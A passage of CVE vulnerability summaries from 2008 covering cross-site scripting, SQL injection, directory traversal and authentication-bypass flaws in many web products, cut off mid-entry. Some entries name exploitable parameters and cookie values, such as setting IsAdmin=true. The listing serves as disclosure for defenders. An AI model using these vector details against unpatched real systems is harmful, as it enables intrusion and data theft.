cross-site scripting (XSS) vulnerabilities in @Mail 5.42 allow remote attackers to inject arbitrary web script or HTML via the (1) file and (2) HelpFile parameters to parse.php, the (3) Folder and (4) start parameters to showmail.php, and the (5) abookview parameter to abook.php. [CVE-2008-4033] Cross-domain vulnerability in Microsoft XML Core Services 3.0 through 6.0, as used in Microsoft Expression Web, Office, Internet Explorer, and other products, allows remote attackers to obtain sensitive information from another domain and corrupt the session state via HTTP request header fields, as demonstrated by the Transfer-Encoding field, aka "MSXML Header Request Vulnerability." [CVE-2008-4020] Cross-site scripting (XSS) vulnerability in Microsoft Office XP SP3 allows remote attackers to inject arbitrary web script or HTML via a document that contains a "Content-Disposition: attachment" header and is accessed through a cdo: URL, which renders the content instead of raising a File Download dialog box, aka "Vulnerability in Content-Disposition Header Vulnerability." [CVE-2008-4013] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2008-4012] Unspecified vulnerability in the WebLogic Workshop component in BEA Product Suite WLW 8.1SP5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to "some NetUI pageflows." [CVE-2008-4011] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote authenticated users to affect integrity via unknown vectors. [CVE-2008-4010] Unspecified vulnerability in the WebLogic Workshop component in BEA Product Suite 10.3, 10.2, 10.0 MP1, 9.2 MP3, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to "some NetUI tags." [CVE-2008-4009] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.1, when configuring multiple authorizers, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter. [CVE-2008-3968] Cross-site scripting (XSS) vulnerability in userlist.php in PunBB before 1.2.20 allows remote attackers to inject arbitrary web script or HTML via the p parameter. [CVE-2008-3966] Multiple cross-site scripting (XSS) vulnerabilities in MyBB (aka MyBulletinBoard) before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via (1) a certain referrer field in usercp2.php, (2) a certain location field in inc/functions_online.php, and certain (3) tsubject and (4) psubject fields in moderation.php. [CVE-2008-3950] Off-by-one error in the _web_drawInRect:withFont:ellipsis:alignment:measureOnly function in WebKit in Safari in Apple iPhone 1.1.4 and 2.0 and iPod touch 1.1.4 and 2.0 allows remote attackers to cause a denial of service (browser crash) via a JavaScript alert call with an argument that lacks breakable characters and has a length that is a multiple of the memory page size, leading to an out-of-bounds read. [CVE-2008-3941] Cross-site scripting (XSS) vulnerability in BizDirectory 2.04 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter in a search action to the default URI. [CVE-2008-3937] Multiple cross-site scripting (XSS) vulnerabilities in Open Media Collectors Database (OpenDb) 1.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) user_id parameter in an edit action to user_admin.php, the (2) title parameter to listings.php, and the (3) redirect_url parameter to user_profile.php. [CVE-2008-3935] Cross-site scripting (XSS) vulnerability in DIC shop_v50 3.0 and earlier and shop_v52 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3926] Multiple directory traversal vulnerabilities in Content Management Made Easy (CMME) 1.12 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the env parameter in a weblog action to index.php, or (2) create arbitrary directories via a .. (dot dot) in the env parameter in a login action to admin.php. [CVE-2008-3924] The "Make a backup" functionality in Content Management Made Easy (CMME) 1.12 stores sensitive information under the web root with insufficient access control, which allows remote attackers to discover (1) account names and (2) password hashes via a direct request for (a) backup/cmme_data.zip or (b) backup/cmme_cmme.zip. NOTE: it was later reported that vector a also affects CMME 1.19. [CVE-2008-3923] Multiple cross-site scripting (XSS) vulnerabilities in statistics.php in Content Management Made Easy (CMME) 1.12 allow remote attackers to inject arbitrary web script or HTML via the (1) page and (2) year parameters in an hstat_year action. [CVE-2008-3921] Multiple cross-site scripting (XSS) vulnerabilities in AWStats Totals 1.0 through 1.14 allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameter. [CVE-2008-3917] Cross-site scripting (XSS) vulnerability in index.php in Ovidentia 6.6.5 allows remote attackers to inject arbitrary web script or HTML via the field parameter in a search action. [CVE-2008-3906] CRLF injection vulnerability in Sys.Web in Mono 2.0 and earlier allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the query string. [CVE-2008-3886] Multiple cross-site scripting (XSS) vulnerabilities in index.php in dotProject 2.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the inactive parameter in a tasks action, (2) the date parameter in a calendar day_view action, (3) the callback parameter in a public calendar action, or (4) the type parameter in a ticketsmith action. [CVE-2008-3884] Cross-site scripting (XSS) vulnerability in Blogn (BURO GUN) 1.9.7 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2006-6176. [CVE-2008-3881] Multiple cross-site scripting (XSS) vulnerabilities in ZoneMinder 1.23.3 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified "zm_html_view_.php" files. [CVE-2008-3874] Cross-site scripting (XSS) vulnerability in account.php in Lussumo Vanilla 1.1.5-rc1, 1.1.4, and earlier allows remote authenticated users to inject arbitrary web script or HTML via the Value field (aka Label ==> Value pairs). NOTE: some of these details are obtained from third party information. [CVE-2008-3860] Multiple cross-site scripting (XSS) vulnerabilities (1) in the WYSIWYG editors, (2) during local group creation, (3) during HTML redirects, (4) in the HTML import, (5) in the Rich text editor, and (6) in link-page in IBM Lotus Quickr 8.1 services for Lotus Domino before Hotfix 15 allow remote attackers to inject arbitrary web script or HTML via unknown vectors, including (7) the Imported Page. NOTE: the vulnerability in the WYSIWYG editors may exist because of an incomplete fix for CVE-2008-2163. [CVE-2008-3850] Cross-site scripting (XSS) vulnerability in Accellion File Transfer FTA_7_0_135 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to courier/forgot_password.html. [CVE-2008-3849] Cross-site scripting (XSS) vulnerability in the calendar controller in Civic Website Manager before 1.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably involving (1) month, (2) day, and (3) year fields. [CVE-2008-3847] Multiple cross-site scripting (XSS) vulnerabilities in AN Guestbook (ANG) before 0.7.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3846] Cross-site scripting (XSS) vulnerability in mysql-lists 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3841] Cross-site scripting (XSS) vulnerability in admin/search_links.php in Freeway eCommerce 1.4.1.171 allows remote attackers to inject arbitrary web script or HTML via the search_link parameter. [CVE-2008-3824] Cross-site scripting (XSS) vulnerability in (1) Text_Filter/Filter/xss.php in Horde 3.1.x before 3.1.9 and 3.2.x before 3.2.2 and (2) externalinput.php in Popoon r22196 and earlier allows remote attackers to inject arbitrary web script or HTML by using / (slash) characters as replacements for spaces in an HTML e-mail message. [CVE-2008-3823] Cross-site scripting (XSS) vulnerability in MIME/MIME/Contents.php in the MIME library in Horde 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via the filename of a MIME attachment in an e-mail message. [CVE-2008-3821] Multiple cross-site scripting (XSS) vulnerabilities in the HTTP server in Cisco IOS 11.0 through 12.4 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the ping program or (2) unspecified other aspects of the URI. [CVE-2008-3787] SQL injection vulnerability in listing_view.php in Web Directory Script 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the name parameter. [CVE-2008-3786] Cross-site scripting (XSS) vulnerability in index.php in PICTURESPRO Photo Cart 3.9 allows remote attackers to inject arbitrary web script or HTML via the qtitle parameter (aka "Gallery or event name" field) in a search action. [CVE-2008-3782] Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in ACG-PTP 1.0.6 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) Category name field under Advertisement Packages, the (2) Reason field under Credit/Debit Users, and the (3) FAQ question and (4) FAQ answer fields under Add New FAQ Entry. [CVE-2008-3781] Cross-site scripting (XSS) vulnerability in GMOD GBrowse before 1.69 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3779] Cross-site scripting (XSS) vulnerability in search/index.php in Five Star Review Script allows remote attackers to inject arbitrary web script or HTML via the words parameter in a search action. [CVE-2008-3778] The remote management interface in SIP Enablement Services (SES) Server in Avaya SIP Enablement Services 5.0, and Communication Manager (CM) 5.0 on the S8300C with SES enabled, proceeds with Core router updates even when a login is invalid, which allows remote attackers to cause a denial of service (messaging outage) or gain privileges via an update request. [CVE-2008-3776] Directory traversal vulnerability in Fujitsu Web-Based Admin View 2.1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2008-3773] Cross-site scripting (XSS) vulnerability in vBulletin 3.7.2 PL1 and 3.6.10 PL3, when "Show New Private Message Notification Pop-Up" is enabled, allows remote authenticated users to inject arbitrary web script or HTML via a private message subject (aka newpm[title]). [CVE-2008-3771] Cross-site scripting (XSS) vulnerability in members.php in Pars4u Videosharing 1 allows remote attackers to inject arbitrary web script or HTML via the PageNo parameter. [CVE-2008-3768] Multiple SQL injection vulnerabilities in class.ajax.php in Turnkey Web Tools SunShop Shopping Cart before 4.1.5 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter in an edit_registry action to index.php, (2) a vector involving the check_email function, and other vectors. [CVE-2008-3758] Multiple cross-site scripting (XSS) vulnerabilities in Lussumo Vanilla 1.1.4 and earlier (1) allow remote attackers to inject arbitrary web script or HTML via the NewPassword parameter to people.php, and allow remote authenticated users to inject arbitrary web script or HTML via the (2) Account picture and (3) Icon fields in account.php. NOTE: some of these details are obtained from third party information. [CVE-2008-3741] The private filesystem in Drupal 5.x before 5.10 and 6.x before 6.4 trusts the MIME type sent by a web browser, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks by uploading files containing arbitrary web script or HTML. [CVE-2008-3740] Cross-site scripting (XSS) vulnerability in the output filter in Drupal 5.x before 5.10 and 6.x before 6.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3739] Cross-site scripting (XSS) vulnerability in (1) System Consultants La!Cooda WIZ 1.4.0 and earlier and (2) SpaceTag LacoodaST 2.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving upload of files containing XSS sequences. [CVE-2008-3738] Session fixation vulnerability in SpaceTag LacoodaST 2.1.3 and earlier allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2008-3735] Cross-site scripting (XSS) vulnerability in index.php in PHPizabi before 848 Core HotFix Pack 3 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a blogs.search action. [CVE-2008-3730] Cross-site scripting (XSS) vulnerability in Nordicwind Document Management System (NOAH) before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3729] Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 allows remote attackers to bypass authentication and obtain administrative access via a direct request with (1) an IsAdmin=true cookie value or (2) no cookie. [CVE-2008-3728] Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to determine the installation path, IP addresses, and error messages via direct requests to files under LOG/. [CVE-2008-3727] Directory traversal vulnerability in Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2008-3726] Cross-site scripting (XSS) vulnerability in Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2008-3715] Cross-site scripting (XSS) vulnerability in inc-core-admin-editor-previouscolorsjs.php in the FlexCMS 2.5 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the PreviousColorsString parameter. [CVE-2008-3714] Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.8 allows remote attackers to inject arbitrary web script or HTML via the query_string, a different vulnerability than CVE-2006-3681 and CVE-2006-1945. [CVE-2008-3712] Multiple cross-site scripting (XSS) vulnerabilities in Mambo 4.6.2 and 4.6.5, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) query string to mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php and the (2) mosConfig_sitename parameter to administrator/popups/index3pop.php. [CVE-2008-3709] Multiple cross-site scripting (XSS) vulnerabilities in CyBoards PHP Lite 1.21 allow remote attackers to inject arbitrary web script or HTML via the (1) lOptionsOptions, (2) lNavAdminOptions, or (3) lNavReturn parameter to options.php [CVE-2008-3700] Multiple cross-site scripting (XSS) vulnerabilities in Kayako SupportSuite 3.20.02 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the sessionid parameter in a livesupport startclientchat action to visitor/index.php [CVE-2008-3683] Unspecified vulnerability in the FTP subsystem in Sun Java System Web Proxy Server 4.0 through 4.0.5 before SP6 allows remote attackers to cause a denial of service (failure to accept connections) via unknown vectors, probably related to exhaustion of file descriptors. [CVE-2008-3679] Multiple cross-site scripting (XSS) vulnerabilities in index.php in IDevSpot PhpLinkExchange 1.01 allow remote attackers to inject arbitrary web script or HTML via the catid parameter in a (1) user_add, (2) recip, (3) tellafriend, or (4) contact action, or (5) in a request without an action [CVE-2008-3678] Cross-site scripting (XSS) vulnerability in admin/search_links.php in Freeway before 1.4.2.197 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2008-3669] SQL injection vulnerability in comments.php in ZeeScripts Reviews Opinions Rating Posting Engine Web-Site PHP Script (aka ZeeReviews) allows remote attackers to execute arbitrary SQL commands via the ItemID parameter. [CVE-2008-3668] Multiple cross-site scripting (XSS) vulnerabilities in the Yogurt Social Network module 3.2 rc1 for XOOPS allow remote attackers to inject arbitrary web script or HTML via the uid parameter to (1) friends.php, (2) seutubo.php, (3) album.php, (4) scrapbook.php, (5) index.php, or (6) tribes.php [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured [CVE-2008-3664] Multiple cross-site scripting (XSS) vulnerabilities in XRMS allow remote attackers to inject arbitrary web script or HTML via (1) the real name field, related to the user list [CVE-2008-3656] Algorithmic complexity vulnerability in the WEBrick::HTTPUtils.split_header_value function in WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted HTTP request that is processed by a backtracking regular expression. [CVE-2008-3650] Multiple unspecified vulnerabilities in Horde Groupware Webmail before Edition 1.1.1 (final) have unknown impact and attack vectors related to "unescaped output," possibly cross-site scripting (XSS), in the (1) object browser and (2) contact view. [CVE-2008-3632] Use-after-free vulnerability in WebKit in Apple iPod touch 1.1 through 2.0.2, and iPhone 1.0 through 2.0.2, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a web page with crafted Cascading Style Sheets (CSS) import statements. [CVE-2008-3622] Cross-site scripting (XSS) vulnerability in Wiki Server in Apple Mac OS X 10.5 through 10.5.4 allows remote attackers to inject arbitrary web script or HTML via an e-mail message that reaches a mailing-list archive, aka "persistent JavaScript injection." [CVE-2008-3602] admin/wr_admin.php in PHP-Ring Webring System (aka uPHP_ring_website) 0.9.1 allows remote attackers to bypass authentication and gain administrative access by setting the admin cookie to 1. [CVE-2008-3596] Cross-site scripting (XSS) vulnerability in Harmoni before 1.4.7 allows remote attackers to inject arbitrary web script or HTML via the Username field, which is inserted into logs that could be rendered when viewed by an administrator. [CVE-2008-3587] Cross-site scripting (XSS) vulnerability in result.php in Chris Bunting Homes 4 Sale allows remote attackers to inject arbitrary web script or HTML via the r parameter. [CVE-2008-3581] Cross-site scripting (XSS) vulnerability in index.php in Qsoft K-Links allows remote attackers to inject arbitrary web script or HTML via the login_message parameter in a login action. [CVE-2008-3574] Multiple cross-site scripting (XSS) vulnerabilities in Pluck 4.5.2, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) lang_footer parameter to (a) data/inc/footer.php [CVE-2008-3572] Cross-site scripting (XSS) vulnerability in index.php in Pligg 9.9.5 allows remote attackers to inject arbitrary web script or HTML via the category parameter. [CVE-2008-3569] Multiple cross-site scripting (XSS) vulnerabilities in XAMPP 1.6.7, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the text parameter to (1) iart.php and (2) ming.php. [CVE-2008-3566] Cross-site scripting (XSS) vulnerability in ZoneO-soft freeForum 1.7 allows remote attackers to inject arbitrary web script or HTML via the acuparam parameter to (1) the default URI or (2) index.php, or (3) the PATH_INFO to index.php. NOTE: the provenance of this information is unknown [CVE-2008-3565] Multiple cross-site scripting (XSS) vulnerabilities in Meeting Room Booking System (MRBS) 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the area parameter to (1) day.php, (2) week.php, (3) month.php, (4) search.php, (5) report.php, and (6) help.php. NOTE: the provenance of this information is unknown [CVE-2008-3560] Cross-site scripting (XSS) vulnerability in kshop_search.php in the Kshop module 2.22 for Xoops allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2008-3559] Multiple cross-site scripting (XSS) vulnerabilities in KAPhotoservice allow remote attackers to inject arbitrary web script or HTML via the (1) filename parameter to search.asp and the (2) page parameter to order.asp. NOTE: the provenance of this information is unknown [CVE-2008-3558] Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote attackers to execute arbitrary code via a long argument to the NewObject method. [CVE-2008-3550] The CQWeb login page in IBM Rational ClearQuest 7.0.1 allows remote attackers to obtain potentially sensitive information (page source code) via a combination of ?script? and ?/script? sequences in the id field, possibly related to a cross-site scripting (XSS) vulnerability. [CVE-2008-3516] Multiple cross-site scripting (XSS) vulnerabilities in files generated by Adobe Presenter 6 and 7 before 7.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) viewer.swf and (2) loadflash.js, a different vulnerability than CVE-2008-3515. [CVE-2008-3515] Multiple cross-site scripting (XSS) vulnerabilities in files generated by Adobe Presenter 6 and 7 before 7.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) viewer.swf and (2) loadflash.js, a different vulnerability than CVE-2008-3516. [CVE-2008-3511] Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Image Gallery (Photo Gallery) allow remote attackers to inject arbitrary web script or HTML via the (1) latest parameter to (a) index.php, (b) images.php, (c) suggest_image.php, and (d) image_desc.php [CVE-2008-3510] Cross-site scripting (XSS) vulnerability in livehelp_js.php in Crafty Syntax Live Help (CSLH) 2.14.6 allows remote attackers to inject arbitrary web script or HTML via the department parameter. [CVE-2008-3505] Cross-site scripting (XSS) vulnerability in PolyPager 1.0 rc2 and earlier allows remote attackers to inject arbitrary web script or HTML via the nr parameter to the default URI. [CVE-2008-3503] RSSFromParent in Plain Black WebGUI before 7.5.13 does not restrict view access to Collaboration System (CS) RSS feeds, which allows remote attackers to obtain sensitive information (CS data). [CVE-2008-3500] Cross-site scripting (XSS) vulnerability in the Suggested Terms module 5.x before 5.x-1.2 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via crafted Taxonomy terms. [CVE-2008-3483] Cross-site scripting (XSS) vulnerability in ScrewTurn Wiki 2.0.29 and 2.0.30 allows remote attackers to inject arbitrary web script or HTML via error messages in the "/admin.aspx - System Log" page. [CVE-2008-3482] Cross-site scripting (XSS) vulnerability in the error page feature in Panasonic Network Camera BL-C111, BL-C131, BB-HCM511, BB-HCM531, BB-HCM580, BB-HCM581, BB-HCM527, and BB-HCM515 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3480] Stack-based buffer overflow in the Anzio Web Print Object (WePO) ActiveX control 3.2.19 and 3.2.24, as used in Anzio Print Wizard, allows remote attackers to execute arbitrary code via a long mainurl parameter. [CVE-2008-3474] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy and obtain sensitive information via a crafted HTML document, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2008-3473] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "Event Handling Cross-Domain Vulnerability." [CVE-2008-3472] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "HTML Element Cross-Domain Vulnerability." [CVE-2008-3458] Vtiger CRM before 5.0.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read mail merge templates via a direct request to the wordtemplatedownload directory. [CVE-2008-3457] Cross-site scripting (XSS) vulnerability in setup.php in phpMyAdmin before 2.11.8 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted setup arguments. NOTE: this issue can only be exploited in limited scenarios in which the attacker must be able to modify config/config.inc.php. [CVE-2008-3451] PhpWebGallery 1.7.0 and 1.7.1 allows remote authenticated users with advisor privileges to obtain the real e-mail addresses of other users by editing the user's profile. [CVE-2008-3448] Cross-site scripting (XSS) vulnerability in index.php in common solutions csphonebook 1.02 allows remote attackers to inject arbitrary web script or HTML via the letter parameter. [CVE-2008-3444] The content layout component in Mozilla Firefox 3.0 and 3.0.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted but well-formed web page that contains "a simple set of legitimate HTML tags." [CVE-2008-3443] The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick. [CVE-2008-3428] Session fixation vulnerability in phpFreeChat 1.1 allows remote authenticated users to hijack web sessions by setting the session_id parameter to match the victim's nickid parameter. [CVE-2008-3425] Unspecified vulnerability in the Sun Java System Web Server 7.0 plugin in Sun N1 Service Provisioning System (SPS) 5.2 and 6.0 allows remote authenticated SPS users to gain administrative access to the web server via unknown attack vectors. [CVE-2008-3423] IBM WebSphere Portal 5.1 through 6.1.0.0 allows remote attackers to bypass authentication and obtain administrative access via unspecified vectors. [CVE-2008-3422] Multiple cross-site scripting (XSS) vulnerabilities in the ASP.net class libraries in Mono 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via crafted attributes related to (1) HtmlControl.cs (PreProcessRelativeReference), (2) HtmlForm.cs (RenderAttributes), (3) HtmlInputButton (RenderAttributes), (4) HtmlInputRadioButton (RenderAttributes), and (5) HtmlSelect (RenderChildren). [CVE-2008-3404] Cross-site scripting (XSS) vulnerability in guestbook.js.php in MJGuest 6.8 GT allows remote attackers to inject arbitrary web script or HTML via the link parameter. [CVE-2008-3398] Multiple cross-site scripting (XSS) vulnerabilities in XRMS CRM 1.99.2 allow remote attackers to inject arbitrary web script or HTML via the msg parameter to unspecified components, possibly including login.php. NOTE: this may overlap CVE-2008-1129. [CVE-2008-3397] Cross-site scripting (XSS) vulnerability in Runesoft Cerberus CMS before 3_1.4_0.9 allows remote attackers to inject arbitrary web script or HTML via a cerberus_user cookie. [CVE-2008-3395] Calacode @Mail 5.41 on Linux uses weak world-readable permissions for (1) webmail/libs/Atmail/Config.php and (2) webmail/webadmin/.htpasswd, which allows local users to obtain sensitive information by reading these files. NOTE: the provenance of this information is unknown [CVE-2008-3394] Multiple cross-site scripting (XSS) vulnerabilities in search.cfm in BookMine allow remote attackers to inject arbitrary web script or HTML via the (1) gallery and (2) search_string parameters. [CVE-2008-3392] Cross-site request forgery (CSRF) vulnerability in Web Wiz Forum 9.5 allows remote attackers to log out a user via a link or IMG tag to log_off_user.asp. [CVE-2008-3391] Multiple cross-site scripting (XSS) vulnerabilities in Web Wiz Forum 9.5 allow remote attackers to inject arbitrary web script or HTML via the mode parameter to (1) admin_group_details.asp and (2) admin_category_details.asp. [CVE-2008-3381] Multiple cross-site scripting (XSS) vulnerabilities in macro/AdvancedSearch.py in moin (and MoinMoin) 1.6.3 and 1.7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3380] Cross-site scripting (XSS) vulnerability in ajaxp_backend.php in MyioSoft EasyBookMarker 4.0 trial edition (tr) allows remote attackers to inject arbitrary web script or HTML via the rs parameter. [CVE-2008-3379] Cross-site scripting (XSS) vulnerability in Snark VisualPic 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the pic parameter to the default URI. NOTE: the provenance of this information is unknown [CVE-2008-3367] Cross-site scripting (XSS) vulnerability in RTE_popup_link.asp in Web Wiz Rich Text Editor (RTE) 3.x and 4.x before 4.03 allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2008-3364] Buffer overflow in the ObjRemoveCtrl Class ActiveX control in OfficeScanRemoveCtrl.dll 7.3.0.1020 in Trend Micro OfficeScan Corp Edition (OSCE) Web-Deployment 7.0, 7.3 build 1343 Patch 4 and other builds, and 8.0 [CVE-2008-3361] Stack-based buffer overflow in IntelliTamper 2.07 allows remote web sites to execute arbitrary code via a long HTTP Server header. [CVE-2008-3358] Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document. [CVE-2008-3353] Multiple cross-site scripting (XSS) vulnerabilities in Pure Software Lore before 1.7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) article comments feature and the (2) search log feature. [CVE-2008-3348] Cross-site scripting (XSS) vulnerability in staticpages/easycalendar/index.php in MyioSoft EasyDynamicPages 3.0 trial edition (tr) allows remote attackers to inject arbitrary web script or HTML via the year parameter. [CVE-2008-3344] Multiple cross-site scripting (XSS) vulnerabilities in staticpages/easyecards/index.php in MyioSoft EasyE-Cards 3.5 trial edition (tr) and 3.10a allow remote attackers to inject arbitrary web script or HTML via the (1) ResultHtml, (2) dir, (3) SenderName, (4) RecipientName, (5) SenderMail, and (6) RecipientMail parameters. [CVE-2008-3342] Cross-site scripting (XSS) vulnerability in staticpages/easypublish/index.php in MyioSoft EasyPublish 3.0tr allows remote attackers to inject arbitrary web script or HTML via the read parameter in an edp_News action. [CVE-2008-3340] Cross-site scripting (XSS) vulnerability in search_result.cfm in Jobbex JobSite allows remote attackers to inject arbitrary web script or HTML via the searchFor variable (possibly the opt parameter.) [CVE-2008-3336] Multiple cross-site scripting (XSS) vulnerabilities in PunBB before 1.2.19 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) include/parser.php and (2) moderate.php. [CVE-2008-3334] Cross-site scripting (XSS) vulnerability in MyBB 1.2.x before 1.2.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving search.php. [CVE-2008-3331] Cross-site scripting (XSS) vulnerability in return_dynamic_filters.php in Mantis before 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the filter_target parameter. [CVE-2008-3330] Cross-site scripting (XSS) vulnerability in services/obrowser/index.php in Horde 3.2 and Turba 2.2 allows remote attackers to inject arbitrary web script or HTML via the contact name. [CVE-2008-3328] Cross-site scripting (XSS) vulnerability in the wiki engine in Trac before 0.10.5 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-3326] Cross-site scripting (XSS) vulnerability in blog/edit.php in Moodle 1.6.x before 1.6.7 and 1.7.x before 1.7.5 allows remote attackers to inject arbitrary web script or HTML via the etitle parameter (blog entry title). [CVE-2008-3318] admin/index.php in Maian Weblog 4.0 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary weblog_cookie cookie. [CVE-2008-3316] Cross-site scripting (XSS) vulnerability in the search feature in the Forum plugin before 2.7.1 for Geeklog allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably related to (1) public_html/index.php, (2) config.php, and (3) functions.inc. [CVE-2008-3315] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the (1) query string to (a) announcements/messages.php [CVE-2008-3305] Cross-site scripting (XSS) vulnerability in mensaje.php in C. Desseno YouTube Blog (ytb) 0.1 allows remote attackers to inject arbitrary web script or HTML via the m parameter. [CVE-2008-3301] Multiple cross-site scripting (XSS) vulnerabilities in BilboBlog 0.2.1 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) content parameter to admin/update.php, related to conflicting code in widget.php [CVE-2008-3295] Cross-site scripting (XSS) vulnerability in modules/system/admin.php in XOOPS 2.0.18.1 allows remote attackers to inject arbitrary web script or HTML via the fct parameter. NOTE: the provenance of this information is unknown [CVE-2008-3293] Directory traversal vulnerability in download.php in EZWebAlbum allows remote attackers to read arbitrary files via the dlfilename parameter. [CVE-2008-3292] constants.inc in EZWebAlbum 1.0 allows remote attackers to bypass authentication and gain administrator privileges by setting the photoalbumadmin cookie, as demonstrated via addpage.php. [CVE-2008-3273] JBoss Enterprise Application Platform (aka JBossEAP or 